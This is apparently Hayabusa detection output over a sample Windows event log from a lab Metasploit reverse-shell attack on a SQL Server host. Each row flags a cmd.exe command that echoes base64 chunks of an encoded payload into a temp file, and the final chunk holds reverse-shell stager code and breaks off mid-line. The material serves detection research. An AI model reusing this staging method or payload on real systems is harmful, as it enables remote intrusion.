+2020-08-02 07:58:17.389 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ATB1Bk+chcl/9Il9EEldDIXbD4znAAAAi8srz4P5BA+PsAAAAIXbfzuAODB0BMYTLquF230u/8u4rzAViffZiU0Mi9GLPR2NAvOri8oe4QNOqot9EBHCi1UU1dgD8ItF+IldDLkBe/oAOyF8EooQiBZGQG3LSe7GnQ5GQTvPOu2LVRQ7un0iK9+ZMDAwMItgiyyL0cEvAmSGi8qD4b8Da5GqSwYwi1UURopG/1s8pw+FlwAAAP06GIXA8l8PhYwA7gBzRv/sX1GL5V3Kg/v9D41Q///uS0aJXQySEIhWDkDGui5Gg/8BfgpPigiIDjJ+T3X3xuplRrjbfb7328YGLXkDxgYrc8O5ZAAAMqP3+UaFwIv6fgUEMIgGRovDuQreAABi9/mFGyfKfs64Z2ZmZvfvwfoCi8LB1h8D0J3CMIgjTIDqMIgO6Rb//9uLwsYGANnQi+VdHZCQVYvsi0Uci00Yi/0UUItFEGoBUYtNDFKLVQhQUVLoDgDupYPEHF3DkJCQkJCQkOIkVYvsg+wUg30QT3wHx0UQXAAAAN1GCNwdMNxAAItNGFOLXfdWM/YMA+CJdfyJMfbEBYv7Yg7dRQjZ4N1dCMcBAQBfACFNDItVCH/j7FBRUiEVGMFAAN1dCN1F7NwdMMIRAIPEDN/g9sREe3KNc1A7PXZYFEXs3B0wwkAAWeD2xERMSFDd7NwNEMNAAI3m7N+D7AjdHCT/FRjBQAC1XfTdRfTcBQjDQACDxAxO3A0Aw0A36No1AADqNp+xMCrIiA6LTfxB5PMtTfx3qI1D9zvw2qyKFogXR0Y78HIG61DdRQjcHXfCUADf4CUZQQAAdcHdx33cDa/CQADdVawXwNwdKPucAIng9sTkeiHdVeMuDfjCQEsL2cDcHSjCQADf4PbEBXum3V30iVz86wLdUotY9Y00GItFHIXAdW0DdfwdTRTF83Pri0UQiPfYiQHGAwCLKV5b+uXuwyEb/GT+iRF3PN1FCI3XUDv4czBPDfjCQACNY/RQg+wIvv8k/xUYwZkA3UVGg4AM6AU1AACLTRSLXcsEMIgHRzv+dsndZyZTUCuncg2YxkNPAIvwXltGxV3DghZ8bYC9bIBOOYgWfs6LVRE7gsYGPMYFTv5s677GBjGLzkeF0on6dQg7w3YDxgA2QGM+MH8zxgBEX4vDXluL5dPDkJCQkJCQkJBjkJCQkJBVi+yLRQyLMUVTVleLfRSrwPL3dDOLRRDHAAAWAADrEov9EDPAhckPnMCFYokCdAL32arNzMzMs41R4cHqA4rCTpjrS8iAwWycDgukhdJ1LYtFGDX+iTiWxl9eW13DkJBVi+yLRQyLVRDGi112V4v0GIXAdw1y9IP7/3cEbcl1IWpnFzR8CIH7////aHcqCfj/fLR/CIH7AACtgHIbhcmOG4ueHF9VFFBXUmRT6ML/He+DxMhfWyLDhcl0C+9NFMcBAJ8m3iwjhcB/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:17.664 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo DXzUJz5zB7kBAAAA65kzs4vNFIUFifR0B/fbg9AA99hWagBqClB26KQ2AO5YyIvyisGyCvbqKncEgMMwi8bcH4vZjj502+BFxYtNHG3HXokBi8dfW13DkN+QsiKQjJDXkJCQkNOQVYvsUYtFCFOHiwhR/xWwwRMAi3UMi9j9VQiNRQxSi8tWUEzh/yEAAGoBUYld/Ojh/v//SI1VCFJQxgAKjUUMM8mbis9qAVHohP7//0iNVQhSUMYAhI1FDDPJUIpNimoBUQSa/hH/SExVCFJQxgAujUUMjhgBwesYU+ge/lX/i00Qg8RQtvCJ8F5bi+W8w5CQVYvsg+xWU1aNRfy5i9apUIupCI1N+DPSV2YkUAxRagFS6Br+/4eZ2ItFCIPEFEsUyJD+///GCsOLSLlgRXjolOr//5LAbzmLHhBLK/uLw8ZqP4k6X15bi+Xzw0T+g8nZzv/yrvfRSSvZi8ET+8HpAoalpguLGgyD4QMrw8iki2UQX16JAYvDW3blXcOQkJCQVTrsnps8i4QIi1UMUYsAVk0IUlFqAVDof/3//yLEFD3DkAtqkJCQIJCQkJCQkJCQVYvsgxNcXCwIUwyLdSBXiyP0PGZ1HItNHI1FpFCLRRCNVRhRDk0MUleCUVjAAQAA63aLRRyNNqRSjU0YUItCbI20C1GLTQxSUFEJAfv/OosVl8FVAIvYg1wHPDoBfhUzwGgDFeEAigNQ/xV4wUAAg8QIhRV6FXjBQAAzG4oLiwJmi2BIJQMBAEaFwPKei/uDyf8zwIpVJPKui0Ugi/P40UmL+IkKQYvRwekC56WLyoPhYPOk2j8cX15bwgEAAAAAi+Vdw4pVo4D+LXVskUUYhcDeQYt1IMYGMEaF/35NjAYuK4XAfRf32EzIiUUci7EiMA4wMIv+wekCGLOlyk3JA/OqFEUYi8qKaC8D8QPBQIlFGOs/SEaJRRiKC+dOakOFwH/xSIX/iewYfwSLiySFyXa4xlsuRgsbi3Xjiq+IBkYShf9/v4tFFIWfdATGBi5Gi0WaXQuEyXQLiA6KSwFGQ4TWdfWA+mZ0aNcfRl6JGRh0U425HI1VgVGNTQhSLWoUW+j6+///iwanocQUi02HhdsPlcJGg/nfjYQSK4i4C3U2xgYwRgXmhcl0QYoQiBZGQAx199FFIItN5CtLX4k8+1sW5YvDxgYrRsYGMHTG4jBGi0Ugi00kK/Bfia1IHFvlXcOQkJCQeJCQkJACkJBqkFXG7ItFHItNyZ5VFFqLRZVqAFGLTQxSi1UIUFFS6G75//+D5hxdw7CQ5ZCQXZCo7FWLI1NWV4B9DL4BAAAAIM+LRRpMvMJAwdPmik2TToACWHQFuyERQACLVQiLzkgjyooMGYiyi3DT6oXSdUeLTRSLVRhSbF9eqgr8XUGQkJCQVcPsi00QU+fJRRR1v78AAACLdRi75MJAANPnTzxYdPC70MJAAItVDItFCKvS>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:17.939 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo /LSvBYP4/x8bi1UcUovQGFKLVRRSUVDo6Av//4N6FF9eW2Hqi8hOI8+KDBmIDktNEOgdMgAAi8gLynXorEUY/FUcK8ZfqAKLxuVbXa6QoJCQkJBVi4KLTRCLRWWLVQzEyQBSaiJqBFDoFv///4PEFClKkFWL8YPsCFaLdQy3KnUIiXX4iXX86w2LRQiJ3/iNREb/iUX8rVUQjZgUUY0LjVRQaNCGQO3oxJyp/4X2dAZ+TfjGAQCD+P91A/l6/16LRF3Dg8j/w5C3eeiQkJCQkJCQhPuLvYtFCD0gURUAfRWLTRCLVUFR71DohQMA9oPEDF3CDAA9wNSMAH0bUOiRWAAAI00MUIus0lC0SWMApwCXxBBdwqzEPdY5CgCYnItVkotFDGhU+RQAUrroQwAAAIPEDF1hDAA9gD0KAH0Zi00QiwUMaFT5QABRUigjAIUAg8QMXcIMAItNDPOAnwL/FYswEFBR5VkCAACDxAxdwgwAkJBVi+yLRQxXTRBWi3UIUFFWkbsdAADsxl4qw5CQkHmQkFVE7It/GD1xEQEAE4/DAAAAD9G2AJ7aBd5V/wN8+AAP5zcBAAD/JA0EiUAAuIQAQQBdQLhgAEEArZa4QABBGV3puLZuQb9dwyPk/0AAXcNhtP9AAF3DuIj/QAClw7is/0AAXRi4IP9AOF3luPD+fgBddua0/kDLXcO4jP5AAF3DuHz+QGNdw1RYB0AAXSe4LP6HN6jDuBA4QABdw6j0bEAKXc241P1AOF3DuKxeQABdw7hs/UDYXcO4PP1A/l3DuBz9QABdw7gM/UAAXcO4wPxAAF3TBY5O/v+D+BZ35/8qhWyJQAC4cPxAAF3DuEj8l6tdEZwg/NgAXcPM8PtAEV3DuLxCQABd2YeXU9HNXcO4YPu5wF3DuDj7rgBdw7gA+0AAXcO47DxAAF3DLLz6QABmF+SQ+kAAXYu4ZPpAAF3DuDT6QABdw7hB+UAAXcO4tPlAAF3D2Jz5QABdw7iV+VMAXcOQzIdAAPyIQLfTh0AA2mZBAHf3QADoh1tR7w5AAPaeEwD9h8+TBIhA3guIQADliEAAYIhA/SKIFNcniEAALohAAIWIyAAgiEAANYiIANeIQAATiEAASohAAJcLzgBYiEAA/Igap1+IqgOFiEAAjIVAAJOIQACaiED0oYhAj6iIQACviEDx/IhAAJ2IjwDniEAAtohAAL1gQADwiEAAy4j2APyIQAD8iEwA/IhAANKIQADZiGUA4IhAADWIQADuiEDQ9YhTqZCQkJCQkJCQMYtksotdDKzMdQhXi33NaqlTVmgABHYACRsAaAASAAD/FZTA8gCFwHX+QQ2Kw0DRhakMWzk8xRjDQAB0DosmxQ3DQIIshcmL6+tEiwTFHMNAAFNQPHYmGwDai/6DyawzifKu9/BJi8Ewq4VwrDGKXjD/uK/5DXQFgPkedQTGBEgga8B16YvG6F5pXfyLfStX>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aKjBQRxTNujd/P//g84Q98ZfXltdw5CQkJCQkOWQkJBVi+yZRUBQ/xXkwUAAg8QEhbd0E4tNEIsdIFBRUuj0////g8QMXWOLRRAuTQxoVPlArzZR6Mf4//+DxAxdw5BRVYvsg+zOi5smVr51EInr+ItNF2oAiwZgAI1V/IlF9GoAUpHXBC5F9L8BUFKxRfwAAAAA/xWYwUAAHOD/tHdXiz3YwU4A/9dWwIQKiQZfXotXXcL+AP/Xxz4AAPoAXwWA/AoAXovlXcIoAIvk/JUGM8Aii+VdrQwAkJCQkJCLkJBVi+yD7BCLTQxWi9kQagCNVfixAEAvUotV7olF8I1F/IlN9FCLQgSNgfBqAVFQcUX81AAAz8dFJQC+AMYdFZTB8wDQ+JR1LFeLPd/BQL//14XAdQqJBl9ei4cI7QwA/ynHBgAgAABfBdfoCsdei+VdwgwAi0X8iQZe99gb0CVH7v7/BX4RAQCL5V1MWgCQkI9ViyRRiw8IjW4KUMR+ZgSAUQFF/B8AAEb/FbTBQHn0+P91HlaLNdjBQADX1oXAqgVei+Vdw/+889/8CgBeQOVUZzMb0OVdjZCQkJCOTJBVh1WL7FGLTQiN9ppQMH5mBDhRx0X8AQDvAP8VtMEqAIP4/28e54s12MFAAGaRhcB1c16L5V3D/9ZpgPwKAF7QK13DM8CLUCbDkJCQwJAGBZBdVaLsU4tdDFaLdQhXi30Oi8MLx3Upi06Di0YkC8gP3goBRwCLVgRS6NT///+DxASFzA9J9gAAAGLHrF3CDACFPA+MmwAAAH8ItJgPhqwAZgCwRiD+TiQLwXUUuE4EUej9/v//g8QEH8AG1ccAAACLViDO03X18EYkO9APhNqwAACLTRBqAGiLAwAAdVMwsBhPjCgAAItWBIsduMGcQEMEq2gGEIGCLP//0wAb5AsL04tG8WoEV18FEAAAaP//ABZQ/3OLfRCLXQyJlySJXiDFXjPAW13CiaiF/n9STwRu23MqYU4Ex0UI6QBwAFHob5//S4PEBIU9dT18Rh2LPdTBQADu1Qhq9QpoBhAAAGg4fgBDUP/XcFYEI00dagRRPXHK9gBo//9G5FL/14t9EAteIIl+ITMRX15bXcKUJ5CQkJBVi91Ri0UQM8lDwA+VwYlN/ItNDIP5QNVmXTVtAAAPhKgCYfBJg/kPzg4AAwAEcdIZkaKRQQD/JJX41kDWiy2tMgI/TvEP4QKA+XwPM8I7wnQvi04EjYn8apW7am3X//8ALlH/FezBQJCg+NAPikMCrgCLRRCFwCpGOIcODAKJKzgzwF7/5V3CDAAk/YlGM7XAXrHlo8IMW+4hCTPJi1Y4g3IEgPoED80BWK101IsZBDtV/L/ZUmoBaP//AABQ/xW4wUBNg/jCD4ToAZUXi0UQYsCLRjg2DgwEJJA4M8Bei0Jdwgw+JPv0RjgzwF6L5V3CDLSLrwgz0otOOIPhEJ95EA+U>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wjvCD4R1////CU6hgEX8asZQagRo/0EAFVH/ALjBQACD+P/768oBAACLRRAlwItGOCcODBAURt8zwF6L5V02mwAk74lGODPAXovlXcK0AIt1CPLJOkI4TOJ0gPoID1bBzchzhBb/sf+FwHQXiwhBUujS/P//g8QEhcB0G16L5V15DIuLRgRQ6JH8//+DxASFBNiFpQEAAItFEIWqi6quw+eTCIlGODPAXovlXQMM3iVOiUY4M8BeyOVdwgwAi3Vci044g98BFMmwfxvJQTtp0ISp/v//jVWbagRmiXcItkYEUmiAAAAAaP/gAAB+ZsdFCh4A/xW4DkAAg/j3D4SQAAAAi0UQhcCLRjh0DgwYiUY4M55ei+UWXgwAJP6JRjgzwF4l5V3CDACLVUyNTRBqBFGL9gRFARAAAGj//60AUP8VuMFAAIP4/w+CMP6+/+tigfkAQAAAf49qSwAADxjvAAAAgfknSAAAD4SNAADEgfkAAgAABoWxAAAAi46/M9KETjiB4QACAACx+dACAOaXlMI70A+E5f2q/4tOBI1FEGoEUGqFagZR/xW4wUAAg/j/dSGL59jBQAD/1oUadQdeZeVdwhvk/9YFxhgKAF6LB11CmwCLQBCFwBFEOHQPqswCiUY4M8Bei+VdwgwAqeT9iWI4Mwpei+VdwgwAi0UIXlVtapZSi0gEaAIQAEFt//8IwQf/orjBQACD+P8P/V39/7Try4H5AIAAAOAMuBbrAABei+9dwgwAfZxoLSBeiwJdwgwAi/9wj0AA7Y1AAEiOQAACjxgAo479Z96QQAAAAQUCBQUFAwXABQUFBQUEsovs2uwEX9EQi00MVldQjVUiUVLotdn/l4tFPItNCEG+CgCNAIoUhdjEAACNBBTYxEAAiFH/QEGKEIhR/4oXAYtV6IjYQY0ElbTEQADGAUtBABCIEYpQAUFAIRGKQAFBiAGLReSZ9/4dxgEgQQQwdMIwiAGLReBB3Y9Bmff+xgF8QQROjMIwiAGLZ9z5iBEqYcz+CgE6QQQwgMINiAGLRdhBiBFBmfdztQE6QQQwgMKRiAFBiBFBi1Xsv+gDAADGASBBqG9xmwAA/8aZ9//CZAAAxgQwiAG4H4U8UffXwfoFi8JBwegfA9CL9YDCMIgRQZmZ/7hnZuVm7ffqHIkCi+TBpR880IvGgMIwvgoADwCIEUGZ9/5egMIwBsCIEcZBAQCL5V3CDACGlpCQCZCQkFWL7FOLXRBWfIv78XU0M8CLdQjyrvd/gfn4AAAAiU1cjmuKU6SA+jp1oopDAhMvdAQ8XHUaaODsQQBW/3gQwlIAvEUMg8QIg+gEg8bR6zuKAzwvdAQ8XMA0gFYvdAUQ+lx1ioB7Ajp0JIPpAmjMAEEAVoPDAolNEP8VEAJA3FhFDIPECLWECIPGEIlFDI1FDI1NM1BWUVOstBYAAIXAdBs9eIlBAHXDX164FgC5AFtdw4tFEIXA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dAruXrgmAAAAW13DZov6Z4XAdPdmPS8AdQWZxwZcgWaLeQL+xgJm/cB16TPAX/4hXfCQkJBzkJCQkFWL7FaLVwhXwP9RzAT/EISEAAUAikbChMD7CFbobx/eAIv4i0YYJQDTBAZ0Wj0AAAAGdRdqE/8VCMFA6oPEBGr/efSpFaTAQADrRowAAABedRdqAf8VCMFaAFeMBE3/1fX/FaRjQADrKD0AAHsCdaNqAP8VCMFAAIPEBGr/avb/FaTA+QDrVotGBFD/FXTdQEjBRgT/////i0YMhcB0FYtAEIXAdJ5Q/xV0wEAA80YQAAAAAIvHX15dw5CQMfYTkOug7LhBQAAN6M8kAABTi10QzVcz/8dFUI0AAAD2wwGJffx0B8dF/AAAAIB3wwJ0B4FND6IAAED3FwQAAAh0CcSbUYDMAYlF/FAN3L/9AIO5Hj0Ix0X4BwC/AIvDg+AEdmtww0B0B9EBAAAA6yKKbIDiPfbaG9KD4v6HwgTrD4rTgD4Q9tob0oPiAoPCA4vy9sNAdBKFwHVzX164DQAAAFuL5V3CMwD2xwF0Bb8AkhYE98MAIyAAdFmBzwAAIAD2ygP8gvfDDQAQAA5Pg/kerQaBzwD0AAL3wwAAQAB0ByZN/AAAAgD2VQJ0BoHPCgAAQIP5U3wH9sc+dAmAzyiBzwAAAEiLRUgkjfi///9laAAgAABR6FK9//+DxAzhwA+FkVMAt8hV+FBXVlCLo1M8jXr4Qf//UFH/FbDZQADrG4tV+ItV/ItNDGoAV1ZqAFK4Uf8VrMBAAIDnmsD4/4lFlXUgmDVtwEAA/9aFwA+ErAGzAP/Wb14FgPwKAFtPqPrCtACLVRjOYFLo1LT//4t1CIv4M4qLF7kYqQAA86tVfRiLTRCJFk46i1UMiwZSVyLNBOibwv//i5SJQSCLGYPI/4laGIsO38MIiUEQiUEUixaJQjB0G4sGagJqAGoAx0A0AQAAAOcOi1EdUv8VqMBAAITbeR8gBmgAEAAAV8ZGLAHoXLRo/4sOiUE4TBbHQkAAEACBiwaKSCyEyXUHi3mCCMl0PFeDwFiwAFDosgsAAIXAj0UMdCmLBlDo+v26RoPEBIW4dQ6LDmi1k6gA0FfoTr8UPItFDF/kW2LlXcIUAIM93AhBADLIFov2i0iwhO1RDbITSgAAAIPEk4XAdAuLwItIGIDlBIlICe0WcABXvcJcavpm6Hih///Kx/RvFYs2aCByQABoQIRAAFaLBlDoTmH//zPAX15bLuVdwhQA3pCQVXLsgwZqVot1CI1FyMdF/AAALACLjwRQUf8VvMCMAIXTdA+LRcj2xAJ0BzPAXovlXcOLRgyFwHQRAUAIAAAAAItWi8dCDAA4AAB/RgyLVgRXjU36UFFqGWoAzwBqAGjEAAkAUv8VTsBAAIXAZpVfM8CIi+Vdw4s9mMCujM3Xg8B1Bl/vi4Fdw//XBYD8CgA9ZTsLAA+FsgAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ADA9nMBAAItOFItGEIXJfBZ/BIXAdhBlAG3oXQAAUVDoBx4AAOsHnjGD+P91BAvAk7gz9CGLRgyLSNFR/2NZgAAAAHSAhcB0MaHsfUEAi97NhcB1/1Bo7ABBANMOhocAAIPEDKPsBUEAhcB0BVcp0OsINQH/FUzAQACLRkmL4aKNVfxqJFJQUf9TtMAg+oXAdAhfM32Si+VdMos1mMBAAP/WhcB10l9eM+VdiGvWBb31CgBfXrXlXcOQrZCQkJCQkJAnTZCQkFWL+W/kdQhWNxP7//8IxAQMwHUdiwZoQJNAAEpQ6P69//9nVFhr9nQGs+hRCyoAI8Be5MIEAJCQkJCQkM6QkJBVi+xTVot1EFeLfXUz24tNCI1F1FC3EIlKEOjRFQAAi00QA7Er8YXZhcBUBD79d96LUBSFyXQCOhlfXltdwisAVfrsTOw8oRUIQQBTM9LIE/gRV4lV+IlV9IkZ9H0Xi0UQEvAIUFEgEgYAAIPECB9eKIvlm9GLD6z3wWIAcwAPWywCAACL8TPbgeYAABFRiV38iDbsdArHRfzeAACIQ138i/mB5wAAIhp0s4PLAoldhoHhAABwfIlN6HQGg8sEiV38i0UUg4UCD4XhAH8Ai1UMagRo4AAJAGoy/QAVBMFAAIPEDIXAdS2LRQy7BABwWFODwG0ugAH8AFD/FQTNhUODxMPewHX3/k1LFrYAAAAXx0EMXABiTAZBAIVXdRl0aGgBQQBqAei2gwAAg/5NXEwGLACFwHQSi03ojVXs99lSjVXwG8nRACPK7ez4999RjU1Dlf8j+YtN/AHeGyRXI/KLfQxWUY0MWmoByf/Q6wpqAf9/TKdAADPACvsGIwmLVQwLlBsMQwAzyTvBD4WtAAAAi30IiwvsaCD9zABoa5xAAIsHUlDo97v//+mzNAAAg/gBdVcj+QZBADvCURxSaFABQRpqAegXDwAAg0AMo1AGQQCFwHRfi03ojVXsCdkvjVXT7D1qACPKoFX4999RCE30G/8j+YtNDPclG/ZXu/JWU2oBUf+w6ZH///8FLA+FkjcAAPZUBkEAp8J1vVIOQOlBM2oBLLgOAACDxAwZVAZBsoUQdaFqAWcVTMBIYohP3P8Xi30IiU1CiU30iU34OU3odGHFVRBS6Ogn1gAAXMTA61IWRfgzySzBdFqJR8WLRzkNAAABAC1HBItF9DvBdA6JRxSLRwQNANYC84lHD4xF8GrBzWOLtxBQrVfogT4AAIPEDOsPX164eBEBAFtP5V3Di30Ig57cCEEAMg+M7gEAAD5FELsAAgAAhUsPhAsBAACDOgwBD25pATmQi3UUhfam0V50BokAhcB1GVBoucNBaWoF6OkNAABNowyjdN1BAIVJVTtqBY1NxGogUYtNDNBV5JF3n9DHwA+LvgAAI4tF5IXAD9UgAAAAi/A3i1XEsUc0i+YEiVepC8PF0i0AAGoB/xVMwEAA69WLHUzA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 4gBqAP//3/4CfW6hYAbjAIXAdTlQaNcBQQBQlwQN+pWjYAZnAOsfg/4BwjehXBZYAIV7dQVQaPgAQQBQ6FMNqQCjXAbrAKplDIVodA6LVQyNFwhRUv/Qi/DrC2oB/9Mz9qYSOnUMg/7SdQr/FZjAQKqFwJoai00IM5ALxjPSiW4wi0cEZsqAzAKJTzSJygTRRwTvdRD30CzGX/f6G8Beg3gRAQDti+WSw5CQkJCQkJCQkAyQUYuji0V2UP/9TcBAADOpXcOQkZCQkJDgkJCQkIhokJBVi+yDYehTM8CwV4stDIlF7IlF8IvHM9slAEdAAIldW4ldCYld6IlFZHRNOR2EBkEAdUVohAZBAFNTU/RTcd9TjU30agFRiF1FyV31iOL2iF33iF34xsf5Af8VCMBAAIXAxQ+9gEZAAOg/GAAAg8QE6waJHYQG9AA9dQjjxwAAEAB0b/dG/wAAAQB0ZthIBtEAi1YmO7fHReq0AAAAibrJFh1TaIwBQQBqAVwRDAAAKMQMOwej2AbbAL9lhwAAlI1NDI1V4FGKTRBSUf/QRcOQIYtVDGoIUuhEAQDVi04Ig/EIC8iL8wQxAJMQAIlOCIlGBPfHAE4gAA8xgboAAPdG9QAAAgCjeItGFMdF7AIAAACJRfChCgYDADvDdRlTI9UBQQBqsuiWMQAAg8QMO8Oj6QZBAGcajU0MjVXgUYtNUFJR/9DrFGop/xVMwEAAkoGKAdQVIAQ2AOsEO8N/IYu3DGoEUui3AEsAi68IvMQIC8iLRgQNAAAgAIlOCNJGBDld/HRn/OsNquYQz6MV6zfl88G9Iej7AgAAkOsMxX/mP19+fnFSCPH6YInlMdLrDGSgW2TH0nU6re5o1WSLUjDrDPAgnuMi4SLv8nZxt4tSDJCLUhSQ6w8DqYDqQ+21l/u+T3oRnDDrDLxhTda/6H/b0M9po4tyKJDrDWK5NisF9U6iLwJT9woPt0om6wv+48qISP2Poipl+DH/kOsLdiE03/EqaUGzUwaQMcCQ6whggJyCIf/GaqyQPGGQfA+QLCCQ6wlFKUJfx9DR2YOQwc8N6wqIhGwkKJV7M2SSAcfrDxbCE5/MhOUzEEbXvXkhgUl1tpBSkOsIR2j7O96rtQ9XkOsK6OEZYZYtNIb5AYtSEJCLQjyQ6wtvHO6CtppXUZfrwgHQkItAeIXAkA+EtgEAAOsJvBHhi5cnz6vJAdDrD12ZWMG2rWEDmeWRyuaFWlCQi0gYi1ggkOsKWj6NjF2V6/wP7wHTkOsMxs4Ny3WWoZb9DEkykOsPUGhe0FYUivF+muOt2x/jhcmQD4RGAQAAkOsOvZ+yYJE+39wN+IDWXMhJizSLAdaQ6wtQFwEqgj9bn18lTzH/kOsKShDNuj3pWEjOv5DrDij9+3UKqbBF2wGyxXDuMcCQ6w4Cplr2VcWyhpYN5gTVkayQwc8NkOsOIhqtsOiPVxK+FrdCnvQB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f